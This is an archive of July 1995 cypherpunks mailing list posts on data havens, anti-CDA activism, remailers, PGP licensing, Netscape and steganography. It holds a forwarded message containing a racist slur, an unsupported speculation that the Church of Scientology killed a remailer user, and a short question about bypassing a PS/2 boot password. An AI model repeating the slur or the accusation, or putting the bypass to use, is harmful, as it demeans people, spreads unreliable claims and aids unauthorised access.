-/_ 6| /|\ | Just Say | |----\ /---- | + v + | "No" to the NSA!| Jail the censor, not the author!| \/ | =======/---------------------------------------------------------VI------/ / I watched and weeped as the Exon bill passed, knowing that yet / / another freedom vanished before my eyes. How soon before we see/ /a full scale dictatorship in the name of decency? While the rest / /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/ From sunder at escape.com Wed Jul 19 15:06:39 1995 From: sunder at escape.com (Ray Arachelian) Date: Wed, 19 Jul 95 15:06:39 PDT Subject: Anti-Electronic Racketeering Act of 1995 (fwd) In-Reply-To: Message-ID: On Thu, 13 Jul 1995, Jon Lasser wrote: > How about "not respecting international copyright law, and not having > extradition treaties with the US" ... set up a data haven, we now know > why we need it soon... charge by the Kbyte, automate the billing, and relax. Seriously bad for my financial health. I write code for a living (though I'm a Netware LAN Admin in this incarnation of a job.) Going somewhere where I can't make money writing code because 10 billion folks will have it after one pays is my idea of jumping out of the microwave oven into the boiling lobster stew. :-) If such systems would be maintenance free, it would be cool going around place to place installing data heaven servers all over the place. Hell a 1Gb hard drive is only $350 or so. A cheap XT, or lap top hooked upto such a drive, say 4Mb of RAM and a 28.8Kbps modem would be good enough. Say some junky assed machine no more than $500 a pop... I would guess we could get a small enough package to hide in say... under the subway tunnels, or in the sewer system, and hook'em up to existing power lines.... Now if we could hook'em up to a phone line easily, it would be a great thing to have. But how do you hook into the phone line without the local MaBell getting interested? Enough of these things hooked up all over the place would be cool. Everyone can ftp to the server, write or read, but nobody can delete. When the drive is full, the server goes read only. Instant (free) data heaven. Get a few million of these up, and hey, you've got instant, unstopable info servers. Very hard for any government to catch all of these. On the other end of el-spectrum d'data heaven is the pay service. You upload, you pay $5 a meg, I burn your megs on the CD. You want the data back, you pay me $50 a meg and I make it available again. :-) You'll be rolling in cash in no time. I don't need to know who you are or what files you sent me. Just tell me the date and time stamp of the file my server got your file and after I get the $50, you get to download the file. Pay me in cash, e-cash, or no-name money-orders. :-) Excellent business, no? Hell, you could probably set something like this up in the USA right now... Even more easily with a 1-900-$5/minute number. As long as what you send me is something I can't see, I don't have any risk and neither do you. Or you can snail mail me a 1.44Mb floppy with a special file name and I'll take the post_mark date and the file name and your $5 and burn it on the CD. Expensive enough to keep pirates away, cheap enough to make corporate data worth backing up remotely. Cost: ~$10K or so... Good pentium server running Linux $2K, 28.8Kbps modems ~$220 each, need no more than 2Gb of hard drive space... (650 of which you set aside for the CD burning.) CD Burner ~$1700. blank CD's for $8 a piece in volume, etc. Good sized data-grade fire proof safe $???? You can hire high school kids to burn the CD's in or your relatives, or do it yourself. Very nice setup. =================================================================93======= + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | \-_ _-/ | \|/ |sunder at escape.com| Where day by day, yet another | \ -- / | <--+-->| | Constitutional right vanishes. |6 _\- -/_ 6| /|\ | Just Say | |----\ /---- | + v + | "No" to the NSA!| Jail the censor, not the author!| \/ | =======/---------------------------------------------------------VI------/ / I watched and weeped as the Exon bill passed, knowing that yet / / another freedom vanished before my eyes. How soon before we see/ /a full scale dictatorship in the name of decency? While the rest / /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/ From shabbir at panix.com Wed Jul 19 15:27:23 1995 From: shabbir at panix.com (shabbir at panix.com) Date: Wed, 19 Jul 95 15:27:23 PDT Subject: Why no action alert, coalition opposing S. 974? In-Reply-To: <300d66d0.flight@flight.hrnowl.lonestar.org> Message-ID: <199507192226.SAA10293@panix4.panix.com> S 974 is a silly bill. It's like someone went around and made a list of all the things that would irk us and then wrote legislation around it. However this bill isn't immediately going anywhere, and there's more dangerous legislation on the floor that is looking a lot like a loaded gun. VTW is tracking this bill and will put out alerts on it if it becomes a more valid threat. However until then we'll not try to divide the forces of the net on bills that aren't yet a serious threat. Read the bill, familiarize yourself with the analyses, but let's not go running off every time some DC bozo writes a terrible bill. Especially when there isn't even a subcommittee hearing scheduled yet. Let's try and do *one thing* at a time. -Shabbir In message <300d66d0.flight at flight.hrnowl.lonestar.org>, Paul Elliott writes: >-----BEGIN PGP SIGNED MESSAGE----- > >I have read the EFF analysis of Senate bill 974, which is designed to >inhibit encryption on Networks. I think that it is a thoughtful document >but I am concerned that there has been no action alert produced to tell >people the most effective way to oppose this horrible Bill. People >who are concerned about the bill need to know what Senators could most >profitably be contacted. Also why has no coalition been formed to oppose >this bill? I am aware that many people are busy opposing S314, but >S974 is equally terrible as it attempts to suppress free expression. > >I could try to produce an action alert myself, but I would probably make >errors as I am not up on the legal subtleties and the intricacies of >Congress. Could some of the savvy people please write an action alert? >Otherwise I will be forced to take a stab at it. > >- -- >Paul Elliott Telephone: 1-713-781-4543 >Paul.Elliott at hrnowl.lonestar.org Address: 3987 South Gessner #2 >24 > Houston Texas 77063 > >-----BEGIN PGP SIGNATURE----- >Version: 2.6 > >iQCVAgUBMA10YfBUQYbUhJh5AQFMBAQAgUJAj1nNdG54IxIFAboCw+Q/E8WWOvEO >9Aazj9hjHK7VeHi+vpTY7eJRbQq7LyQq/ex41PE+QXu+mjWe3c1si8HmhherA22i >CUGv3UI8L/Z43zLtN2TI9reJsizeYnmHlO3uUffP3vnhwBJm1G7EAlXvKFqikC90 >q1DUqqgq7k4= >=4yQ7 >-----END PGP SIGNATURE----- > From sunder at escape.com Wed Jul 19 15:28:04 1995 From: sunder at escape.com (Ray Arachelian) Date: Wed, 19 Jul 95 15:28:04 PDT Subject: EVENT: NY-only, non-NY folks ignore (fwd) Message-ID: =================================================================93======= + ^ + | Ray Arachelian | Amerika: The land of the Freeh. | \-_ _-/ | \|/ |sunder at escape.com| Where day by day, yet another | \ -- / | <--+-->| | Constitutional right vanishes. |6 _\- -/_ 6| /|\ | Just Say | |----\ /---- | + v + | "No" to the NSA!| Jail the censor, not the author!| \/ | =======/---------------------------------------------------------VI------/ / I watched and weeped as the Exon bill passed, knowing that yet / / another freedom vanished before my eyes. How soon before we see/ /a full scale dictatorship in the name of decency? While the rest / /of_the_world_fights_FOR_freedom,_our_gov'ment_fights_our_freedom_/ ---------- Forwarded message ---------- Date: Tue, 18 Jul 1995 01:12:41 -0400 (EDT) From: She Devil With A Modem! To: sunder at escape.com Subject: EVENT: NY-only, non-NY folks ignore (fwd) Also Sprach Shabbir J. Safdar: >From shabbir at panix.com Mon Jul 17 23:51:37 1995 Date: Mon, 17 Jul 1995 23:45:32 -0400 From: "Shabbir J. Safdar" Message-Id: <199507180345.XAA05923 at panix3.panix.com> To: stop314 at panix.com Subject: EVENT: NY-only, non-NY folks ignore ====================================================================== Campaign to stop the 1995 Communications Decency Act FREE NEW YORK WORKSHOP We encourage you to forward this to friends DO NOT REDISTRIBUTE AFTER July 22, 1995 ______________________________________________________________________ WORKSHOP DETAILS What: A free workshop on current online censorship legislation and the viable alternatives. When: Saturday July 22nd, 1-4pm Where: ACLU offices at Times Sq (132 West 43rd St at 6th Ave) Who: Everyone (teachers, librarians, businesses, everyone!) Agenda: Crash Course on the First Amendment and the New Censorship Legislation Questions and Answers About How the CDA Affects You and Your Business How to Lobby Your Representative Plans for the New York Lobby Day Against the CDA: Wednesday, July 26th ______________________________________________________________________ WHY YOU SHOULD ATTEND THE WORKSHOP Are you interested in seeing our government become less intrusive, not larger, and less involved in personal decisions about what you read? Do you believe that Constitutionally-protected speech should not be regulated by the FCC (or any other Federal agency)? Do you believe that computer networks are a tremendously powerful tool for giving many more people in our society a voice, bypassing traditional forms of media? If you find the above three questions compelling, you should be concerned about the 1995 Communications Decency Act (CDA). Having already passed the Senate, the CDA is headed for the House and has favorable odds of passing there as well if nothing is done. The CDA was passed by the Senate 84-16. It was voted on by many legislators who not only never use a computer, but have never read email, logged onto a BBS, read Usenet news, or seen a Web page. They were simply voting with their gut reaction, unaware that they were disastrously affecting the future of American expression and the most explosive industry seen in the last ten years. It *doesn't* have to be that way. We as New Yorkers can't expect our elected officials to vote out of a vacuum. We need to tell our Representatives that online systems are a new medium, not the same as a telephone, nor the same as television. They need to understand that the Internet and bulletin boards aren't simply Dial-A-Porn lines, or adult cable channels. However they won't come to these conclusions themselves; they need your help. Come to this free workshop and learn what you can do to help ensure that online communication isn't restricted unreasonably. _______________________________________________________________________ SUPPORTING ORGANIZATIONS American Civil Liberties Union, College Art Association, Creative Coalition, Feminists for Free Expression, and the Voters Telecommunications Watch _______________________________________________________________________ FOR MORE INFORMATION For more information about the CDA Workshop on July 22nd, contact: Shabbir Safdar, Voters Telecomm Watch Email: vtw at vtw.org (718) 596-7234 Ann Beeson, American Civil Liberties Union Email: beeson at aclu.org (212) 944-9800 x788 For more information about the CDA, see: Web Sites URL:http://www.panix.com/vtw/exon/ Gopher Archives: URL:gopher://gopher.panix.com/11/vtw/exon Email: vtw at vtw.org (put "send cdafaq" in the subject line) ________________________________________________________________________ LIST OF PARTICIPATING ORGANIZATIONS In order to use the net more effectively, several organizations have joined forces on a single Congressional net campaign to stop the Communications Decency Act. American Civil Liberties Union * American Communication Association * American Council for the Arts * Arts & Technology Society * Association of Alternative Newsweeklies * biancaTroll productions * Californians Against Censorship Together * Center For Democracy And Technology * Centre for Democratic Communications * Center for Public Representation * Citizen's Voice - New Zealand * Computer Communicators Association * Computel Network Services * Computer Professionals for Social Responsibility * Cross Connection * Cyber-Rights Campaign * CyberQueer Lounge * Dutch Digital Citizens' Movement * Electronic Frontier Canada * Electronic Frontier Foundation * Electronic Frontier Foundation - Austin * Electronic Frontiers Australia * Electronic Frontiers Houston * Electronic Frontiers New Hampshire * Electronic Privacy Information Center * Feminists For Free Expression * First Amendment Teach-In * Florida Coalition Against Censorship * FranceCom, Inc. Web Advertising Services * Friendly Anti-Censorship Taskforce for Students * Hands Off! The Net * Human Rights Watch * Inland Book Company * Inner Circle Technologies, Inc. * Inst. for Global Communications * Internet On-Ramp, Inc. * Joint Artists' and Music Promotions Political Action Committee * The Libertarian Party * Marijuana Policy Project * Metropolitan Data Networks Ltd. * MindVox * National Bicycle Greenway * National Campaign for Freedom of Expression * National Coalition Against Censorship * National Gay and Lesbian Task Force * National Public Telecomputing Network * National Writers Union * Oregon Coast RISC * Panix Public Access Internet * People for the American Way * Rock Out Censorship * Society for Electronic Access * The Thing International BBS Network * The WELL * Voters Telecommunications Watch (Note: All 'Electronic Frontier' organizations are independent entities, not EFF chapters or divisions.) ________________________________________________________________________ End Alert ======================================================================== -- ()()()()() All that matters is that ]{ |BTCOMH|-| Eileen Tronolone -===========================]*\\\{O | (tm) | | System Administrator two stood against many... ]{ |______|-/ redsonja at computel.com From sandfort at crl.com Wed Jul 19 16:33:14 1995 From: sandfort at crl.com (Sandy Sandfort) Date: Wed, 19 Jul 95 16:33:14 PDT Subject: cypherpunk "Zen" victories In-Reply-To: <199507191703.KAA20332@netcom23.netcom.com> Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, I'm almost at a loss for words. I have had my troubles with, and suspicions of, "Vladimir Z. Nuri." Right now, though, I don't care if he is the DetMan or not. His most recent posting, "cypherpunk `Zen' victories," was dead bang right on. For those of you who may have deleted it without reading it, I have included it below. It's very, very good. Hey, if it really is you, Larry, stay on the medication (or off it, as the case my be). S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ On Wed, 19 Jul 1995, Vladimir Z. Nuri wrote: > I was recently marvelling at how much the "cypherpunk agenda" > is being advanced even in light of what would seem to be setbacks. > Particularly in the area of anonymous remailers. We now have a very > major article on remailers and Julf's setup in the NYT that portrays > them in an unbiased, unhysteria-stricken mode. Also in the article, > it quotes the police as regretting their falling victim to > Scientology manipulation and investigating the remailer "without > cause". A major officer is quoted as saying, roughly, "we are > going to need a crime before we investigate in the future". > > Look what we got out of this: > > 1) incredible positive publicity for Julf, > Hero of the Net > > 2) introduction of the concept of anonymous remailers > to the layman > > 3) police awareness. increased reluctance to go on anonymous remailer > witchhunts. advice to other police to do the same. > > 4) only *one* address was compromised on Julf's system. a small price > to pay for all this > > 5) Time Magazine also did an article on Julf a few months ago and > this compromise in identity. *astonishing* publicity. > > All in all, I would say the effect was an overall "net positive". > It reminds me of a zen-like saying, "sometimes you lose by winning > and win by losing". It would seem on the face of it that the > Helsingius Affair was a debacle from the point of view of pseudonymity. > However I would consider it a extraordinary success. > > The major foes of pseudonymity have so far been misguided police forces > in Finland, who now say they resent the solicitude of the US into their own > affairs, and would not be so eager to cooperate in the future; > another foe is a radical religious cult that is finding its own > set of 20th century heretics, and attempting to excommunicate them. > In the meantime, with each exposure, the idea of anonymity and > pseudonymity is gaining powerful friends. > > Also, a long time ago a major foe of anonymity was Dick Depew. An > article came out on him in the WSJ that made him look awfully > silly. He is roundly considered one of the more legendary net > crackpots today. > > === > > I'd also like to point out that the recent Rimm job affair is > another "net positive" for the net. Rimm has been so utterly > thoroughly discredited and blackened by his own personality > and background, as reported by Brock Meeks recently, it is > amazingly hilarious. Rimm has become the laughingstock of > cyberspace in the way that Cantor and Siegal were > > We could not have asked for a better setup for embarrassing > and humiliating the media into realizing the core issues > involving pornography on the internet. If someone did this > intentionally, it would have been considered a brilliant > trap. Time and DeWitt have been savaged by very reputable people, and > I'm sure they consider the article a fiasco from a credibility standpoint. > Any magazine that covers pornography in cyberspace in the future > will be very gunshy and will not be so flippant, if they can > stand poking the hornet's nest at all. > > === > > Another area is in the bills that are being introduced in congress. > It would seem these are a fiasco from the point of view of > those interested in cyberspace. But there are backlashes even > in congress. Was it Markey that introduced a bill that made > cyberspace off limits to future draconian legislation? All this > also forces legislators to figure out what the hell they are dealing > with, and they are finding out what their own authority in the > matter is. I think the wise ones may figure out that if they > don't play nice, we may take our marbles away and go play with > someone else. D.Frissell said something profound in his letter > to the editor, "Congress thinks the Internet can be controlled. > We who built it, and continue to build it, think it cannot be. > It will be interesting to see who is right". His comparing it > with the ideas in the declaration of independence, that "when > a government no longer serves the people, they have a right to > overthrow it", is extremely apropos in cyberspace, where it > may be more possible than ever for those who desire freedom > to make those who are apposed to it, completely irrelevant. > > T.May suggest that we just give up the fight in congress, saying > that bills can be introduced faster than we can fight them. I > agree with the observation but not the conclusion. > Bills have a very hard time getting to be law. > They are very fragile in initial stages, and at these points they > can indeed be killed with a little pressure in the right spots. > We are learning where those spots are. > > At this point I think it is not in the interests of those promoting > cyberspace to try to evade congress. So far, it has not proved itself > to be completely hostile to the point of trying to shut down cyberspace > to the degree it does not fit its own agenda. And as long as they > are not outright enemies, some could be turned into powerful > promoters. The idea of abandoning educating/influencing congress > entirely seems like a kind of unhealthy nihilism to me. There are > allies in congress and there are people listening there. Their > unawareness seems amazingly proportional to the cluelessness of > the general population about cyberspace (and I see extremely > encouraging signs both are rapidly diminishing). > > The bills seem to becoming more desperate and draconian in their > language. This is a sign of fear and dread on the side that seeks > to regulate bits. They are in a tricky position, because the more > draconian the language, the less likely it is to be passed and > taken seriously. People become suspicious and hypersensitive to > the infractions. To a large degree, many parts in the government > only gain their power through secrecy. As people become more aware > of the power flow, they disrupt and seize it themselves. Every bill > that has more desperate language is the other side revealing > their secret agenda, to control thought, which I think reasonable > people are increasingly considering and recognizing as bogus > and bankrupt. > > Congress will eventually polarize into being generally promoting > of cyberspace, or outrightly hostile to it. Cyberspace will > inevitably escape its grip if congress goes in this direction. To use > Zen analogies again, there is the idea that water is the most > powerful force on the earth, because it simply flows around > that which opposes it. I find that cyberspace is wholly analogous. > In fact it seems to me that cyberspace would give Lao Tzu > a whole new cuttingly apt metaphor for his philosophies!! > > === > > So the next time that you rant about how some bill or another > means the Death of the Net, or the police investigating a remailer > means the downfall of cryptoanarchy, or a lousy article with a > zillion distortions comes out, think again. The greatest cypherpunk > victories are emerging through what would appear at first to be the > "blackest" moments. > > viva la cryptoanarchy!!! > > > ~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^ > \ / ~/ |\| | | |> | : : : : : : Vladimir Z. Nuri : : : : > \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html > From werner at mc.ab.com Wed Jul 19 16:53:32 1995 From: werner at mc.ab.com (tim werner) Date: Wed, 19 Jul 95 16:53:32 PDT Subject: Is it legal for commercial companies to use PGP? Message-ID: <9507200230.AA05467@mondo.ab.com> >From stewarts at ix.netcom.com Tue Jul 18 02:51:50 1995 >Date: Mon, 17 Jul 1995 23:52:35 -0700 >At 09:07 PM 7/17/95 -0400, tim werner wrote: >>>... I was talking to one of the sys admins at >>>A-B, and he said that we weren't allowed to use PGP to encrypt our mail, >>>because Viacrypt owned the commercial rights. >Actually, it's less clear than that. >Selling software containing the code is pretty clearly commercial. >Non-commercial messages from your personal non-business machine are >clearly non-commercial. Providing a service of encrypting and decrypting >messages for people for money sounds like it's _very_ probably commercial. >Encrypting and decrypting messages to/from your business that deal with money >are a very gray area. Maybe "commercial company" is the wrong expression. All I meant was that my company is not non-profit, or a university, or a government organization. It is an engineering firm. What I have in mind is nothing to do with a commercial use of encryption per se. If they decided to put encryption into a product, that would be something else entirely. I doubt they would ever be using it to accept payment for the stuff they sell, although I don't really know much about the marketing aspect of the business. Basically, I have two potential uses for it: 1) I have some email pen-pals that I would like to be able to use PGP to talk with. All my other accounts (freenet, school) have mail forwarded to what I think of as my email "home address", which is my work address. I would like to use that work account to process my email. Is it legal to use PGP 2.6.2 for this purpose? I'd also like to be able to tell fellow workers that they can use it, and show them how. 2) It's entirely likely that people within the company may wish to get into the habit of transmitting company data in encrypted form. This is not a question of incorporating the encryption technology into a product, or even into the sale of a product -- it's just a question of keeping intra-company information transfers private. The first is the one I'm really concerned with. The second would be sort of a natural extension that, if legal, would be nice. I can't imagine that these uses are subject to the ViaCrypt license, but I need some reassurance/ammunition in order to be a little more open about getting it installed on the machines in my department. thanks, tw -- Well, Bust My Britches! Eggs Almondine and a Bottle of Beaujolais! From hkhenson at shell.portal.com Wed Jul 19 17:05:24 1995 From: hkhenson at shell.portal.com (H Keith Henson) Date: Wed, 19 Jul 95 17:05:24 PDT Subject: cypherpunk "Zen" victories Message-ID: <199507200244.TAA14857@jobe.shell.portal.com> > 4) only *one* address was compromised on Julf's system. a small price > to pay for all this Just for what it is worth, there has been considerable speculation as to the fate of -AB-, whoes real login was tc at alumni.caltech.edu. The real world name was supplied by Caltech to the LAPD who, it seems, turned it over to the scientologists. Caltech has been trying to contact this person for some time now, after being presented with a very irregular written request to turn the backup tapes on this act over to the CoS reps. CoS upper management has long showed the willingness to kill (as exposed by affidavits) but has failed in the "execution" phase. It really makes me wonder if they managed it this time. Keith Henson From frogfarm at yakko.cs.wmich.edu Wed Jul 19 17:19:14 1995 From: frogfarm at yakko.cs.wmich.edu (Damaged Justice) Date: Wed, 19 Jul 95 17:19:14 PDT Subject: 9th Amendment References In-Reply-To: <2561@umlaw.demon.co.uk> Message-ID: <199507200025.UAA02138@yakko.cs.wmich.edu> Michael Froomkin writes: > As my final word on this thread, let me say that if you are really > interested in the 9th Amendment, by far the best legal article on > the subject that I know of is Charles L. Black, Jr, On Reading > and Using the Ninth Amendment. You need LEXIS to look this up? Must have been published in one of those legal journals that only the priests of the black robe are allowed to subscribe to. :) May I recommend Bennett B. Patterson: _The Forgotten Ninth Amendment: A Call for Legislative and Judicial Recognition of Rights Under Social Conditions of Today_. Originally published in 1955 by Bobbs-Merrill of Indianapolis and authored by a member of the Texas Bar. Supposedly long out of print, the master plates are rumored to have been destroyed. A reprinted edition was being made available recently as part of a "9th Amendment Legal Defense Kit" that a man named Conrad LeBeau was selling a few years ago (by all reports, he was fighting the FDA with marginal success, since FDA jurisdiction is a matter of contract law). At last report, you could reach Conrad at: Health Freedom Reporter, PO Box 272, Hales Corner, WI, USA. Another good one is Randy Barnett's _The Rights Retained by the People: The History and Meaning of the Ninth Amendment_. The Web link at Book Stacks is: http://melville.books.com/scripts/view.exe?sid~cMLVLlgYLKcBX4f/ISBN~0913969443 -- http://yakko.cs.wmich.edu/~frogfarm | PGP signed mail preferred "On a superhighway existing roads are destroyed, it's easy to monitor traffic, you can't make your on-ramp, politics controls development and they arrest you if you go too fast, travel in your own direction or use unapproved technology." - kpc at ptolemy.arc.nasa.gov | Freedom...yeah, right. From tcmay at sensemedia.net Wed Jul 19 18:56:27 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Wed, 19 Jul 95 18:56:27 PDT Subject: Data Havens and Intellectual Property Message-ID: Ahh, a meaty subject at long last! At 9:59 PM 7/19/95, Ray Arachelian wrote: >On Thu, 13 Jul 1995, Jon Lasser wrote: > >> How about "not respecting international copyright law, and not having >> extradition treaties with the US" ... set up a data haven, we now know >> why we need it soon... charge by the Kbyte, automate the billing, and relax. > >Seriously bad for my financial health. I write code for a living (though >I'm a Netware LAN Admin in this incarnation of a job.) Going somewhere >where I can't make money writing code because 10 billion folks will have >it after one pays is my idea of jumping out of the microwave oven into >the boiling lobster stew. :-) Agreed, things may be rough for the folks profiting from the current intellectual property laws. But many nations don't agree with our notions of what is one's intellectual property. ("Galombosians" believe one's _ideas_ are one's property, subject to collection of fees. "You mentioned "remailers"...please remit $1.33 to....") >If such systems would be maintenance free, it would be cool going around >place to place installing data heaven servers all over the place. > >Hell a 1Gb hard drive is only $350 or so. A cheap XT, or lap top hooked >upto such a drive, say 4Mb of RAM and a 28.8Kbps modem would be good enough. >Say some junky assed machine no more than $500 a pop... I think you're making the point: machines on the Net are getting much, much cheaper, which will make "Mom and Pop remailers" much more common. Importantly, these remailers will be common--someday, if not this year--in non-U.S. jurisdictions. The growth of Net and Web services has been astounding, even to me (someone whose first Arpanet account was in 1973). This will put Cypherpunks services into many more places. --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From dougr at skypoint-gw.globelle.com Wed Jul 19 19:07:37 1995 From: dougr at skypoint-gw.globelle.com (Douglas B. Renner) Date: Wed, 19 Jul 95 19:07:37 PDT Subject: Stego-Rants ? In-Reply-To: Message-ID: On Wed, 19 Jul 1995, Timothy C. May wrote: > At 7:57 AM 7/19/95, Douglas B. Renner wrote: [snip] > >I'd conjecture that it's possible. Imagine fractal compression of a text > >file, with the decompression routine adding some "randomness" which would > >be your message, obscured at a very abstract level. Depending on how > >much "randomness" was added, I'm wondering if the resulting text might > >possibly retain some of its original legibility (?) ... [snip] > >(I am looking at an ad for a graphics program, "Images Incorporated" by > >Iterated Systems which with fractal techniques can achieve 100:1 > >compression -- and then -- decompress to 8 times the original bitmap size > >with minimal added distortion.) > > But fractal compression schemes are usually _lossy_, that is, some of the > original bits are irretrievably lost. (This should be clear also from the > amount of compression achieved....multiple files/images compress to the > "same" smaller file--by the "pigeonhold principle.") > > Lossy compression is often OK for visual images and audible files, a la > music, but would be pretty bad for any scheme dependent on encryption. > Yes; however It's not so much the compression ratio I was concerned with other than that it demonstrates the level of abstraction achieved in the analysis. For crypto we wouldn't really mind if the intermediate fractal file were actually larger than the original and I assume that these techniques can be lossless if we are willing to accept this tradeoff. What I think is remarkable about the example of compression and enlargement is that with the process of enlargement, image *detail* is added in a manner consistent with the original. (!!!) By altering the decompression with a hidden message one would of course be, replacing or adding information, and if the goal were to have this new information "blend in" with its container, then perhaps we could learn from fractal compression. Doug From tcmay at sensemedia.net Wed Jul 19 19:10:06 1995 From: tcmay at sensemedia.net (Timothy C. May) Date: Wed, 19 Jul 95 19:10:06 PDT Subject: Netscape the Big Win Message-ID: Here is my experience with the last month of heavily using Netscape (1.1N), after several years of using a mix of Unix-based tools on a Unix shell account at Netcom (and several years of using Portal before that, beginning in 1988). (And intermittent Net use from 1973, when I had a very primitive account in college at UC Santa Barbara, on the "Arpanet," to the mid-80s, when I had various accounts while still at Intel.) * I use Netscape to read News. * I use Netscape to access the Web. * I still use Eudora to send and receive Mail. (Netscape can currently send mail, but not receive it. This is likely to change soon.) Why is this important? I believe, quite strongly, that we are headed toward a situation where the large majority of Net/Web users are using some variant of Netscape, or Mosaic/MacWeb/etc. (but probably Netscape, for various reasons). Integration of crypto into Netscape is thus the Big Win. I felt this was the case as far back as last fall, but my recent experiences tell me this is more important than ever. Integration of PGP and other crypto routines into Tin, Pine, Elm, Joe, Emacs, etc., is just not as important. IBM just paid nearly $3 billion for Lotus, largely for the "common platform" of Lotus Notes. I believe Netscape is an even more important common platform, and will displace Notes. I have been asked many times by various of you about investments, as I've been making my living the past decade through investments. The message here is my strongest statement about what to invest in. (I'm not saying one has to stand in line for the August IPO of Netscape Communications, but the overall market will favor the Web browsers, especially Netscape.) The relevance for Cypherpunks interested in writing code is that, in my carefully considered opinion, writing for Netscape and other Web browsers is the Big Win. Even over Windows (except Windows browsers, of course). --Tim May .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at sensemedia.net | anonymous networks, digital pseudonyms, zero 408-728-0152 | knowledge, reputations, information markets, Corralitos, CA | black markets, collapse of governments. Higher Power: 2^756839 | Public Key: PGP and MailSafe available. "National borders are just speed bumps on the information superhighway." From hshubs at BIX.com Wed Jul 19 20:13:44 1995 From: hshubs at BIX.com (hshubs at BIX.com) Date: Wed, 19 Jul 95 20:13:44 PDT Subject: There is a God In-Reply-To: <2yc78c1w165w@alamo.net> Message-ID: <9507192311.memo.13425@BIX.com> Where was this reported, please? -------- Original Message -------- Return-path: Received: from delphi.com by bix.com (CoSy3.31.1.50) id <9507130936.memo.90466 at BIX.com>; Thu, 13 Jul 1995 09:36:37 -0400 (EDT) Received: from relay4.UU.NET by delphi.com (PMDF V4.3-9 #10880) id <01HSTF2JAFE899G4G7 at delphi.com>; Thu, 13 Jul 1995 09:34:42 -0400 (EDT) Received: from toad.com by relay4.UU.NET with SMTP id QQyyfe10461; Thu, 13 Jul 1995 09:30:32 -0400 Received: by toad.com id AA14137; Thu, 13 Jul 95 06:09:07 PDT Received: from news1.crl.com by toad.com id AA14131; Thu, 13 Jul 95 06:09:02 PDT Received: from alamo.net by news1.crl.com with UUCP id AA02826 (5.65c/IDA-1.502 for cypherpunks at toad.com); Thu, 13 Jul 1995 05:50:46 -0700 Received: (from waffle at localhost) by ephsa.alamo.net (8.6.10/8.6.10) with UUCP id GAA12500 for cypherpunks at toad.com; Thu, 13 Jul 1995 06:18:35 -0500 From: jmm0021 at alamo.net (Jason Montgomery) Date: Thu, 13 Jul 1995 06:12:12 -0500 (CDT) To: cypherpunks at toad.com Message-id: <2yc78c1w165w at alamo.net> Subject: There is a God Sender: owner-cypherpunks at toad.com Content-transfer-encoding: 7BIT Organization: ALAMO Internet -- San Antonio, Texas X-Envelope-to: bix.com!hshubs Precedence: bulk On ABC's latenight news program I just saw a story that renewed my faith that there is a God and he is brown. It seems that the Alabama Milita was able to film a ATF event that was truly horrifing to behold. Nigger Hunging Licenses and the works. Well our friends in Alabama gave the tapes to ABC and the story was blown wide open. Our friends from Alabama in the pursuit of the ATF did the world a great service and completely restored my faith in America. Jason Montgomery ps. The spelling errors are all mine its 6 in the morning and im out of caffine. ---------------------------------------------------------------- Jason Montgomery jmm0021 at alamo.net ---------------------------------------------------------------- From cellf at free.org Wed Jul 19 20:20:09 1995 From: cellf at free.org (jon cameron) Date: Wed, 19 Jul 95 20:20:09 PDT Subject: PS/2 passwd bypassed at bootup? Message-ID: I know that removing the battery in a PS/2 "disengages" the password. But can it be disengaged if a person has an administration-type of diagnostic/setup/boot-up floppy? From cman at communities.com Wed Jul 19 20:24:58 1995 From: cman at communities.com (Douglas Barnes) Date: Wed, 19 Jul 95 20:24:58 PDT Subject: Netscape the Big Win Message-ID: >Integration of crypto into Netscape is thus the Big Win. > This is why Amanda and I have been working on crypto tools for Java, a "safe" programming language that will be embedded in Netscape in the (hopefully) not-too-distant future. In addition to eventual incorporation in Netscape, it is currently available on Suns running Solaris 2.4 and PCs running Windows NT. See: http://www.cs.utexas.edu/users/achou/JCrypt/packages.html This is also why October is "Java month" for the cypherpunks Bay Area meeting. Marianne Mueller (mrm at eng.sun.com) is organizing speakers and coordinating the schedule for that month's meeting. Java will be available for Windows 95 about the time Win 95 is released, and a Mac version is due out "Real Soon Now." The Mac version has been demoed to industry insiders already. One of the obvious advantages is that it should be possible to write a nice, GUI interface once, and be done with all of the tiresome porting that seems to occupy too much of our time. From monty.harder at famend.com Wed Jul 19 20:37:06 1995 From: monty.harder at famend.com (MONTY HARDER) Date: Wed, 19 Jul 95 20:37:06 PDT Subject: Stego Standards Silly Message-ID: <8AD8535.00030001EC.uuout@famend.com> LM> I think I need to clarify my threat model. I'm positing a scenario in which LM> transmission of ciphertext and stegoed anything is illegal, but transmission LM> and use of "conspicuous" digital signatures is legal. Furthermore, the govt. ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Ah. No big deal then. After stegoing, you sign the GIF. LM> sanitizes the LSBs of digital images for our protection, perhaps distorting LM> a mean of X% of the LSBs of a mean of Y% of transmitted images. Out-of-stego- LM> channel checksummation would IMHO be crucial in such a situation. Sending multiple copies of the same GIF would go a long way toward solving this, if X% and Y% were low enough. Say I get 5 copies, and reconstruct the origial via a "voting" protocol. Also, if we break down the file into smaller blocks, and sign each block individually, we can narrow down the errors. But I am having a real problem with an overt policy of fiddling with people's mail. If they did that, it would likely cause a huge backlash that would be felt at the ballot box. * --- * Monster at FAmend.Com * From lmccarth at cs.umass.edu Wed Jul 19 21:56:21 1995 From: lmccarth at 